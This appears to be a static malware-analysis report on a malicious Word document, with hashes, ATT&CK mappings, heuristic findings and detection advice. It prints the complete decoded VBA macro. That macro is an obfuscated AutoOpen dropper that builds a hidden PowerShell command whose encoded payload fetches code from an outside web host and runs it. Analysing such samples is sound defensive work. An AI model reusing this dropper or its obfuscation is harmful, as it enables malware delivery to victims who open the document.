Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f423ebaa64cfe955…

MALICIOUS

Office (OLE)

283.0 KB Created: 2018-02-12 14:29:00 Authoring application: Microsoft Office Word First seen: 2018-03-04
MD5: 8bc3e9454707aeb24ca447892bfc1beb SHA-1: 2a7c304e07642c4935a6fa88f7d1d0bef3c180e5 SHA-256: f423ebaa64cfe9558cc67e7da6d44a53ba765eb6523be18cbf81932683bc57a0
110 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment; T1059.005 Visual Basic

The sample is a malicious Office document containing VBA macros. The AutoOpen macro is designed to execute obfuscated PowerShell commands, likely to download and run a secondary payload. The presence of legacy WordBasic markers and the AutoOpen macro suggest a common macro-based malware delivery technique.

Heuristics 5

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        FT_PH = FT_PH + JO_QD
        Shell$ FT_PH
    End Sub
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "synergy"
    Sub AutoOpen()
        Dim FT_PH As String
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the legacy Word macro execution surface; by itself it is not an attribution to a downloader or to a parser CVE.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6210 bytes
SHA-256: e0dc7301e0c1234cf444e0f007ffc13c807334ad091b5de2b19cff08f574a565
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header for the document's default ThisDocument class module.
' Only attribute lines were recovered for this module; no procedures appear here.
' The executable logic is in the separate "synergy" module that follows in the carve.

Attribute VB_Name = "synergy"
' Standard module "synergy" containing the auto-executing AutoOpen procedure.
' Runs when the document is opened in Word with macros enabled (AutoOpen is a
' legacy Word auto-exec name, flagged by OLE_VBA_AUTOOPEN above).
'
' Analyst notes (derived from the code below, no behaviour inferred beyond it):
'   * FT_PH is assembled one character at a time by indexing the fixed
'     character table GS_SJ; replaying the index sequence yields a PowerShell
'     command line with a hidden window, a bypassed execution policy and an
'     encoded-command switch ("-e "), i.e. the launcher prefix.
'   * JO_QD is assembled by concatenating the string literals held in the
'     many Dim'd locals; the text is base64-shaped and the first literal
'     decodes to the start of a PowerShell function, so the blob presumably
'     is a UTF-16LE-encoded script (TODO: confirm by decoding it offline in an
'     isolated analysis environment; it likely holds the download-stage URL
'     the report refers to).
'   * The two parts are joined and handed to Shell$, so the document process
'     spawns a child process with that command line.
' Detection: winword.exe spawning powershell.exe with an encoded command and
' a hidden window is the observable to hunt for; the interleaving of the two
' assembly strands and the random-looking local names are obfuscation only.
' Note GS_SJ and JO_QD are never Dim'd (no Option Explicit is present), so
' they are implicit Variants.
Sub AutoOpen()
    Dim FT_PH As String
    ' Character table for the launcher prefix; FT_PH picks from it by index.
    GS_SJ = Array("-", "a", "u", "t", "h", " ", "l", "w", "e", "o", "d", "y", "p", "n", "c", "b", "i", "x", "s", "r")
    Dim AT_KI As String
    ' First chunk of the base64 blob (decodes to the beginning of "function ...").
    AT_KI = "ZgB1AG4AYwB0AGk"
    ' Prefix assembly begins: GS_SJ(12) = "p", GS_SJ(9) = "o", ...
    FT_PH = FT_PH + GS_SJ(12)
    FT_PH = FT_PH + GS_SJ(9)
    Dim JM_PC As String
    JM_PC = "AbwBuACAAYQAoACQAeAA"
    FT_PH = FT_PH + GS_SJ(7)
    FT_PH = FT_PH + GS_SJ(8)
    Dim HK_LG As String
    HK_LG = "pAHsAcgBlAHQAdQByAG4AI"
    FT_PH = FT_PH + GS_SJ(19)
    FT_PH = FT_PH + GS_SJ(18)
    Dim AL_OA As String
    AL_OA = "ABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAA"
    FT_PH = FT_PH + GS_SJ(4)
    FT_PH = FT_PH + GS_SJ(8)
    Dim FT_MG As String
    FT_MG = "uAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4AR"
    ' Chunks are appended to JO_QD five at a time, in literal order.
    JO_QD = JO_QD & AT_KI & JM_PC & HK_LG & AL_OA & FT_MG
    FT_PH = FT_PH + GS_SJ(6)
    FT_PH = FT_PH + GS_SJ(6)
    Dim DP_OG As String
    DP_OG = "wBlAHQAUwB0AHIAa"
    FT_PH = FT_PH + GS_SJ(5)
    FT_PH = FT_PH + GS_SJ(0)
    Dim ET_PD As String
    ET_PD = "QBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG"
    FT_PH = FT_PH + GS_SJ(7)
    FT_PH = FT_PH + GS_SJ(16)
    Dim GL_OF As String
    GL_OF = "4AdgBlAHIAdABdADoAOgBGAHIAbwB"
    FT_PH = FT_PH + GS_SJ(13)
    FT_PH = FT_PH + GS_SJ(10)
    Dim FO_TI As String
    FO_TI = "tAEIAYQBzAGUANgA0A"
    FT_PH = FT_PH + GS_SJ(9)
    FT_PH = FT_PH + GS_SJ(7)
    Dim FT_QF As String
    FT_QF = "FMAdAByAGkAbgBnACgAJAB4ACkAKQB9ADsAaQBlAHgAIA"
    JO_QD = JO_QD & DP_OG & ET_PD & GL_OF & FO_TI & FT_QF
    FT_PH = FT_PH + GS_SJ(18)
    FT_PH = FT_PH + GS_SJ(3)
    Dim DK_TJ As String
    DK_TJ = "AkACgAYQAgACQAKAAkACgAJAAoAGkAbgB2AG8AawB"
    FT_PH = FT_PH + GS_SJ(11)
    FT_PH = FT_PH + GS_SJ(6)
    Dim ER_SI As String
    ER_SI = "lAC0AdwBlAGIAcgBlAH"
    FT_PH = FT_PH + GS_SJ(8)
    FT_PH = FT_PH + GS_SJ(5)
    Dim JQ_NE As String
    JQ_NE = "EAdQBlAHMAdAAgACcAaAB0AHQ"
    FT_PH = FT_PH + GS_SJ(4)
    FT_PH = FT_PH + GS_SJ(16)
    Dim CS_KB As String
    CS_KB = "AcABzADoALwAvAHUAcwBwAHIAZAA1A"
    FT_PH = FT_PH + GS_SJ(10)
    FT_PH = FT_PH + GS_SJ(10)
    Dim FK_NH As String
    FK_NH = "DEANQAwAGMAZQBuAHQAcgBhAGw"
    JO_QD = JO_QD & DK_TJ & ER_SI & JQ_NE & CS_KB & FK_NH
    FT_PH = FT_PH + GS_SJ(8)
    FT_PH = FT_PH + GS_SJ(13)
    Dim GK_KH As String
    GK_KH = "ALgB0AGEAYgBsAGUAL"
    FT_PH = FT_PH + GS_SJ(5)
    FT_PH = FT_PH + GS_SJ(0)
    Dim AL_PH As String
    AL_PH = "gBjAG8AcgBlAC"
    FT_PH = FT_PH + GS_SJ(8)
    FT_PH = FT_PH + GS_SJ(17)
    Dim AR_SD As String
    AR_SD = "4AdwBpAG4AZABvAHcAcwAuAG4AZ"
    FT_PH = FT_PH + GS_SJ(8)
    FT_PH = FT_PH + GS_SJ(14)
    Dim CQ_LI As String
    CQ_LI = "QB0AC8AdwBhAHIAZ"
    FT_PH = FT_PH + GS_SJ(2)
    FT_PH = FT_PH + GS_SJ(3)
    Dim IS_PA As String
    IS_PA = "QBoAG8AdQBzAGUAPwAkAGYAaQB"
    JO_QD = JO_QD & GK_KH & AL_PH & AR_SD & CQ_LI & IS_PA
    FT_PH = FT_PH + GS_SJ(16)
    FT_PH = FT_PH + GS_SJ(9)
    Dim HO_LB As String
    HO_LB = "sAHQAZQByAD0AUABhAHIAdABpAHQAaQBvAG4ASwBlAHkAJ"
    FT_PH = FT_PH + GS_SJ(13)
    FT_PH = FT_PH + GS_SJ(12)
    Dim AS_LF As String
    AS_LF = "QAyADAAZQBxACUAMgAwACUAMgA3AHMAdABhAGcAZQAlADIAN"
    FT_PH = FT_PH + GS_SJ(9)
    FT_PH = FT_PH + GS_SJ(6)
    Dim CS_MA As String
    CS_MA = "wAmACQAUwBlAGwAZQBjAHQAPQBkAGEAdABhACYAcwB"
    FT_PH = FT_PH + GS_SJ(16)
    FT_PH = FT_PH + GS_SJ(14)
    Dim EM_RH As String
    EM_RH = "2AD0AMgAwADEANwAtADAANAAtAD"
    FT_PH = FT_PH + GS_SJ(11)
    FT_PH = FT_PH + GS_SJ(5)
    Dim GR_TJ As String
    GR_TJ = "EANwAmAHMAcwA9AGIAZgBxAHQAJgB"
    JO_QD = JO_QD & HO_LB & AS_LF & CS_MA & EM_RH & GR_TJ
    FT_PH = FT_PH + GS_SJ(15)
    FT_PH = FT_PH + GS_SJ(11)
    Dim JO_OD As String
    JO_OD = "zAHIAdAA9AHMAYwBvACYAcwBwAD0AcgB3AGQ"
    FT_PH = FT_PH + GS_SJ(12)
    FT_PH = FT_PH + GS_SJ(1)
    Dim JT_PF As String
    JT_PF = "AbABhAGMAdQBwACYAcwBlAD0"
    FT_PH = FT_PH + GS_SJ(18)
    FT_PH = FT_PH + GS_SJ(18)
    Dim EK_TD As String
    EK_TD = "AMgAwADEANwAt"
    FT_PH = FT_PH + GS_SJ(5)
    FT_PH = FT_PH + GS_SJ(0)
    Dim IP_RE As String
    IP_RE = "ADEAMAAtADAANgBUADIA"
    FT_PH = FT_PH + GS_SJ(8)
    ' Last prefix character appended here: GS_SJ(5) = " ", the separator
    ' before the encoded blob.
    FT_PH = FT_PH + GS_SJ(5)
    Dim DL_OA As String
    DL_OA = "MgA6ADQAMQA6ADEAMgBaAC"
    JO_QD = JO_QD & JO_OD & JT_PF & EK_TD & IP_RE & DL_OA
    ' From here on only the base64 blob is extended; the prefix is complete.
    Dim GO_PJ As String
    GO_PJ = "YAcwB0AD0AMgAwADEANwAtAD"
    Dim AS_KA As String
    AS_KA = "AAOQAtADIAOABUADEANAA6ADQAMQA6ADEAMgBaACYAcwBwA"
    Dim CN_OI As String
    CN_OI = "HIAPQBoAHQAdABwAHMAJgBzAGkAZ"
    Dim IT_OE As String
    IT_OE = "wA9AHQAegBQADcAYwA4"
    Dim BO_OD As String
    BO_OD = "AHgAWgBoAHIAM"
    JO_QD = JO_QD & GO_PJ & AS_KA & CN_OI & IT_OE & BO_OD
    Dim JP_LA As String
    JP_LA = "QBzAGIAd"
    Dim GQ_PD As String
    GQ_PD = "gB4ADkAZgBKAFMAdwBKAEkAUwBIAEIANgBlADgAJQAyAEI"
    Dim CQ_TI As String
    CQ_TI = "AbgBsAGwAdQB"
    Dim IN_TB As String
    IN_TB = "uAEgAaQBmAEwAMwBoAHgAagA0ACUAMwBEAC"
    Dim IP_PE As String
    IP_PE = "cAIAAtAEgAZQBhAGQ"
    JO_QD = JO_QD & JP_LA & GQ_PD & CQ_TI & IN_TB & IP_PE
    Dim JP_RC As String
    JP_RC = "AZQByAHMAIABAAHsAJwBBAGMA"
    Dim JN_LF As String
    JN_LF = "YwBlAHAAdAAnAD0AJwBBAHAAcABs"
    Dim IM_RE As String
    IM_RE = "AGkAYwBhAHQAaQBvAG4"
    Dim JN_RC As String
    JN_RC = "ALwBKAFMATwBOACcAfQApAC4"
    Dim HT_OF As String
    HT_OF = "AQwBvAG4AdABlAG4AdAAgAHwAIABDAG8AbgB2AGU"
    JO_QD = JO_QD & JP_RC & JN_LF & IM_RE & JN_RC & HT_OF
    Dim IT_MA As String
    IT_MA = "AcgB0AEYAcgBvAG0ALQBKAHMAbwBuACkAL"
    Dim GQ_RC As String
    GQ_RC = "gB2AGEAbAB1AGUALgBkAGEAdAB"
    JO_QD = JO_QD & IT_MA & GQ_RC
    Dim DM_PJ As String
    DM_PJ = "hACkAKQ"
    JO_QD = JO_QD & DM_PJ
    Dim GS_PH As String
    ' Final chunk ends in "=", the base64 padding that closes the blob.
    GS_PH = "A="
    JO_QD = JO_QD & GS_PH
    ' Launcher prefix + encoded blob form the full command line.
    FT_PH = FT_PH + JO_QD
    ' Shell$ spawns the child process (the OLE_VBA_SHELL finding above).
    Shell$ FT_PH
End Sub